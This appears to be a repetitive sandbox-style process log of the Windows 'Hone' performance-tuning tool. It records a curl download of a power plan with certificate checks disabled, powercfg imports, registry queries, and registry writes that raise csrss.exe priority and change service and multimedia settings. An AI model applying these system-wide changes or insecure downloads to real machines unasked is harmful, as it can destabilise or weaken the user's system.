C:\Windows\system32\curl.exe
curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"
C:\Windows\system32\powercfg.exe
powercfg /d 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get numberOfCores /value
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
C:\Windows\system32\powercfg.exe
powercfg -setactive "44444444-4444-4444-4444-444444444449"
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "
C:\Windows\system32\find.exe
find "N/A"
C:\Windows\system32\curl.exe
curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"
C:\Windows\system32\powercfg.exe
powercfg /d 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449
C:\Windows\system32\powercfg.exe
powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get numberOfCores /value
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 1
C:\Windows\system32\powercfg.exe
powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
C:\Windows\system32\powercfg.exe
powercfg -setactive "44444444-4444-4444-4444-444444444449"
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB" /t REG_DWORD /d 5217772 /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass /t Reg_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority /t Reg_DWORD /d "3" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NoLazyMode" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "AlwaysOn" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "10" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
